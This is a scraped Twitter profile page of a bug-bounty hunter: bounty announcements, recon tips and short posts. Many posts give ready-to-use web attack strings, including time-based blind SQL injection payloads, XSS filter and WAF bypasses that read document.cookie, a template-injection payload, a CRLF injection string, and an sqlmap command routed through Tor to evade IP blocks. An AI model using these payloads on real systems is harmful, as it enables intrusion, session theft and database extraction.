Lu3ky13 ⚡️⚡️
@lu3ky13
Followers
10,269
Following
731
Media
389
Statuses
1,563
ṙ̷̐̊̉̈͒̓̒̈́̐̀̓̅̂̈́̎́̉̋͌̚̚̕Security Researcher And Security Developer #CAPen #CAP #ewpt #ccna #CCSP -AWS #eCPPT CEO @CyberShield01 ⚡️⚡
kurdistan
Joined December 2019
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Ireland
• 243650 Tweets
Norway
• 200071 Tweets
古谷さん
• 60323 Tweets
ソフトバンク
• 39100 Tweets
安室さん
• 34035 Tweets
死刑求刑
• 28486 Tweets
声優交代
• 27517 Tweets
Irlanda
• 26187 Tweets
Noruega
• 24704 Tweets
ホークス
• 18193 Tweets
たまちゃん
• 15766 Tweets
KATY PERRY IS COMING
• 15567 Tweets
キャラの私物化
• 15006 Tweets
Paula Vennells
• 14474 Tweets
مورينهو
• 13475 Tweets
きさらぎ駅
• 10971 Tweets
$PIKA
• 10465 Tweets
Pinned Tweet
2023, 2022
top 10 injections and XSS
Highest Reputation top 17 Oct-Dec 2022
2023 top 23
#bugbounty
#hackerone
@hackerone
6
6
103
Add to your list
#SQL
#injection
payload
#BugBounty
1%27/**/%256fR/**/50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
30
260
789
17
67
563
Bypass XSS WAF and Filters and Akamai
src,svg,autofocus,iframe,img,<> all blok
use this payload add to your list
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#BugBounty
#bugbountytip
@safin_mohammed_
9
153
561
6000$ increase to 7 or 8000$
this program paid me 6k, which increased to 7 or 8k after I found SQL injection, XSS, csrf, RCE
I just used two tools,
I will share them soon,
manual testing, for the finding parameters I used two tools coming soon
#bugbountytips
#bugbounty
15
50
494
[SQL Injection]
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
do you want to learn how? Visit our website
#bugbounty
#bugbountytip
7
83
442
how I found XSS AND SQL INJECTION
1 I found text.php
2 I used Arjun to find parameters
3 text.Php?m=1'xss and SQL
done, I submitted to h1
#bugbounty
#hackerone
#bugbountytips
17
97
410
Sql Injection
Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
#bugbountytips
#BugBounty
#SqlInjection
6
60
418
SQL Injection
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#sqlinjection
#ghauri
#bugbounty
#bugbountytips
9
68
393
After more than three hours we were able to bypass this xss
with
@Arez_1110
payload
#"></div><a href= javascript:alert(document.domain)
#bugbounty
#bugbountytip
#hackerone
8
58
334
I found 255 to 300 Bug in one subdomin
The programs paid me 5 digit B
RCE
sql
ATO
all other type of bugs
The program responded once a month, paying $3,700 each month
I found this all in one month and now I've been receiving that money every month for a year 😬
#bugbountytips
14
23
310
I sent more than 20
#SQL
#injections
to one program, do you know how?
-
-
-
-
-
-
-
-
Only using the Arjun tool by
@s0md3v
#bugbounty
#bugbountytip
18
28
287
We currently have 1,600,000 domains and subdomains on 5 vps
We have also run this command in two ways
It waybacks the whole list one by one and then runs the nuclei
Second
subdomains list+wayback+sqlmap+
You can send billions of requests with
@Arez_1110
#bugbountytips
#bugbount
9
63
258
11000 reputation on
@Hacker0x01
11k 💪 i submitted 30 bug in two days ✌️ wait for moe
#bugbountytips
#bugbounty
17
6
245
15
12
247
Database pwned
1:- I used dirsearch to find README+md file
2:- I opened README md I found
"host=localhost dbname=ttt user=ttt pass=ttt"
3:- I used DirBuster to find PHPMyAdmin or Adminer
4:- done
#sqlinjection
#bugbountytips
#BugBounty
#PHPMyAdmin
#Adminer
#HackerOne
11
50
242
[CRLF Injection]
payload
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff
#bugbountytip
#bugbounty
7
44
242
# Authorization-Nuclei-Templates 1000$
I got these templates from Google and edited them later with help
web archive and subdomin scanner I was able to find bugs twice on two private programs
#hackerone
#bugbounty
#Authorization
#Nuclei
#bugbountytips
13
69
236
bypass blocking IP, in sqlmap, i found SQL injection in normal scan my IP was blocked I used tor to send a request and I bypassed this issue
sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor if not work change time-sec or use proxy list
#bugbounty
#bugbountytips
5
71
228
Blind SQL Injection
phone_number=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&pin=1&submit=Continuar
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
@Hacker0x01
1
71
220
Bypass Reset Password Code Lead to Account Takeover
GitHub python script
#bugbountytips
#bugbounty
3
63
226
Yay, I was awarded a $7,500 bounty on
@Hacker0x01
!
#togetherwehitharder
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
13
18
198
I submitted XSS and access admin panel to Apple on 10/2020
no bounty
no response
it's fixed
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
27
23
196
RCE-log4jrce CVE-2021-44228
Yay, I was awarded a $3,600 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
#kurdistan
#kurd
#hashtag
#kurde
#kurdistan
5
15
200
Host header attack on Reset Password Lead to Account takeover and Bypass Redirect on response body
bypass Redirect Host header attack
#bugbounty
#hackerone
#bugbountytips
14
38
193
Yay, I was awarded a $2,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Apache Log4j2 JNDI Remote Code Execution
#hackerone
#Apache
#Log4j2
#JNDI
#Remote
#Code
#Execution
6
10
189
2021 7500$ XSS
#TikTok
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
#kurdistan
#kurd
#hashtag
#kurde
#kurdistan
10
14
182
Client Side Template Injection to XSS
Add to your List 🫡
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval(%27a,alert(1),a%27)}}
#bugbounty
#bugbountytip
3
31
183
Yay, I was awarded a $3100 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
the first time I submitted an xss like this
><script>alert(1)</script> I bypassed JSON response
second, after the fixed bug, I found a bypass with its payload
#BugBounty
#bugtips
4
11
176
I wrote these two scripts for a private program to produce a bug. I succeeded and received more than $1,000
brute-force directory work-with-multithreading
check url list via cookies and Authorization
+
#bugbountytips
#bugbounty
4
68
168
bypass cloudflare XSS
<svg onload=prompt%26%23x000000028;document.domain)>
<svg onload=%0Aalert1>
<svg onload=alert%26%230000000040"1")>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<svg onload=alert%26%230000000040"")>
#bugbounty
#bugbountytips
#bug
1
42
164
SQL injection ASP by Ibrahim Husić
Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20`
#bugbountytips
#BugBounty
1
39
162
Mr. Robot: Self Xss from Informative to high 1200$ ,csrf, open redirect,self xss to stored
#bugbounty
#bugbountywriteup
#bugbountypoc
#hackerone
6
53
157
I used Burp Bounty Pro and Burp scanner and manually couldn't bypass this xss but I used
@KN0X55
it bypassed. this is not ads for KNOX but it's very cool I like supporting this man
#BugBounty
#hackerone
#BugBounty
7
9
157
Yay, I was awarded a $3,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
RCE-log4jrce CVE-2021-44228
2
5
143
Happy to cross 5000 reputation points
today, I was awarded more than 22 Triaged. and bounty
I submitted SQL injection,XSS.csrf.clickjacking, ATO, RCE The program paid me $10,000
#hackerone
@Hacker0x01
#BugBounty
#bugbountytips
10
11
139
Yay, I was awarded a $1,500 bounty on
@Hacker0x01
!
Account Takover via reset password 😁 I wrote a Python script for the attack
#TogetherWeHitHarder
9
6
136
How this tool work?
1) Enumeration all target subdomain.
2) All subdomain test with httpx to find live domain.
3) All subdomain tested one by one with nuclei to find a vulnerability.
4 in comment
#bug
#bugbountytips
#BugBounty
7
37
136
1/1
Bypass Authorization Login into the Admin panel
1 download appe.exe and install it for windows
2 capture requests i used fiddler
3 update your profile the app sends a request to the server via the admin account i don't know why
#bugbountytips
#BugBounty
5
44
134
1
37
129
It's a very good program He quickly gave me a $4,300 bounty
ATO + html injection
If the website sends a request via GET username and password , directly search for another user and pass in web archive
#bugbounty
#bugbountytips
#bb
#hackerone
3
8
119
SQL injection my method -1 OR 3*2*1=6 AND 000159=000159
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
@Hacker0x01
3
33
117
I have found Local File Inclusion (LFI) in this PHP
1 first I found PHP files
2 I found the params
3 download. php?file=../.
<?php
$filename = basename($_GET['file']);
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
#BugBounty
#bugbountytip
1
38
116
Hello dear Jober please can you send an update to this report 4 months have been resolved no one has responded
@jobertabma
report id :
#2263294
5
5
119
#TogetherWeHitHarder
I was awarded a $2000 bounty on
@Hacker0x01
I've reported 50 bugs and only got paid for 3 bugs yet
#hackerone
#bugbounty
4
3
107
#bug
#bounty
#writeups
All my writeups
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
#kurdistan
#kurd
#hashtag
#kurde
#kurdistan
buymeacoffee! 🎉
0
34
103
if you don't have a computer you can use these tools for recon in your mobile
link bot:
#bugbounty
#bugbunnychallege
#bugbountyhunter
2
31
105
#bugbounty
to
#cryptocurrency
I earned money in bug bounty I lose in cryptocurrency :D ahaha
9
2
103
Spider X , XSScanner , Subdomain scanner daily
i found RXSS and used
@novasecio
thank you
@0xblackbird
#bugbounty
#bugbountytips
6
21
105
bypass two-factor authentication in Android apps and web 1000$ TikTok
thank you for
#zug
#s3c
#bugbountytips
#BugBounty
#bugbountywriteup
6
26
105
Yay, I was awarded a $1,420 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Ssrf
Scan intarnal port
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
4
7
101
I hacked Cloud Computer Hackerone Triager 🧐
I got access to Cloud Computer Hackerone Triager
#hackerone
@hackerone
#bugbountytips
#bugbountytip
6
14
119
10k reputation on
@Hacker0x01
! Keeping the Internet safe 👊 🫡
#BugBounty
#HackForGood
#togetherwehitharder
8
1
104
4
4
98
AI helped me get $500 bounty with just one line of code
Spring Boot Actuator H2 RCE
#BugBounty
#bugbountytip
#hackerone
#bugcrowd
0
22
98
For those who are new to bug bounty, you can use this tool It makes it easy for you. We have combined most of the tools into one tool
#bugbounty
#bugbountytips
3
19
97
#bug
#bounty
#writeups
All my writeups
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
#kurdistan
#kurd
#hashtag
#kurde
#kurdistan
0
28
96
Soon Full account takeover in TikTok 🤐 writeups
#TikTok
#TogetherWeHitHarder
#bugbountytips
#hack
#bug
#security
#bugcrowd
#bugbounty
#infosec
#hackerone
#kurdistan
#kurd
#hashtag
#kurde
#kurdistan
2
5
92
Access to SSH password and MongoDB database
I used this it's very cool
thank you
@mikey96_bh
If you have a bounty program you like hacking on then try out the - we will return any data on the subdomains/services we have indexed and if we don't have the data we will go out and fetch it for you with an email notification when done.
4
85
294
2
11
90
How I Found Sql Injection on (h1) in 5 minute $350
#hackerone
#bug
#BugBounty
#Security
#infosec
#bugcrowd
#bugbountytips
#bugbountytip
#CyberSecurity
#100DaysOfCode
#Malware
#CodeNewbie
#BugHunter
#Javascript
1
80
86
thank you
@__mohammed_a_
@KN0X55
API to find xss This is very nice and working good
#bugbounty
#bugbountytips
7
8
91
Open to collaborate
Is there any way to bypass [06:51:19] [WARNING] invalid character detected, retrying.
@zseano
@_xploiterr
@nav1n0x
@GodfatherOrwa
thank you
15
5
88
after I submitted (Server-side template injection) and i got a duplicate 1000$ I lost it
Then I was upset
after that, I spend 2 days and found a ton of bug
Bypass Authorization Login into Admin panel
Server-side template injection -4-
RXSS -5-
Sql Injection -3-3
#BugBounty
5
5
83
Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!
#BugBounty
#bugbountytips
#bugbountywriteup
1
20
85
I reached the 10000 Reputation Milestone and thought they would send me a plane of swag
I had told all my friends to be present that day because there were so many swags I couldn't carry
#hackerone
3
0
82
use this bot in a telegram to find a subdomain
if you don't have a computer you can use this bot
#bugbountytips
#BugBounty
#hackerone
#bugs
2
18
81
Happy to cross 4000 reputation points on
@Hacker0x01
#bugbounty
#hackerone
#TogetherWeHitHarder
#bugbountytips
#security
#bugcrowd
#bugbounty
#hackerone
#hack
#bug
#security
#bugcrowd
#infosec
#kurde
#kurdistan
7
1
76
XSS finder working with to find links and parameters injectable to xss to many
#bughunter
need this tool
#TogetherWeHitHarder
#bugbounty
#bugbountytips
#RCE
#AppSec
#hackerone
#bugbountytips
#security
#bugcrowd
#security
2
20
76
Yay, I was awarded a $1,000 bounty on
@Hacker0x01
!
with
@__mohammed_a_
bug Ddos 🤔
#TogetherWeHitHarder
4
3
75
new version coming soon,
In this version you will be able to enumeration subdomains by using a list of domains or single domains, and more all in one
#bugbounty
#bugbountytip
#hackerone
2
19
76
On 30/08/2023 a new scope was added to the program I reported 14 bugs, sql injection, XSS, and on 31/08/2023 The program was closed [Out of scope]
#bugbounty
#hackerone
3
2
73
3G log file 30M line
After finding the log file I was able to find 10 bugs
SQL injection and XSS
It's still going on
#bugbounty
#hackerone
#bugbountytips
3
10
70
4
1
68
Yay, I was awarded a $1,368 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Access Admin panel 😁 8.7 to 7.7 🥵
2
2
69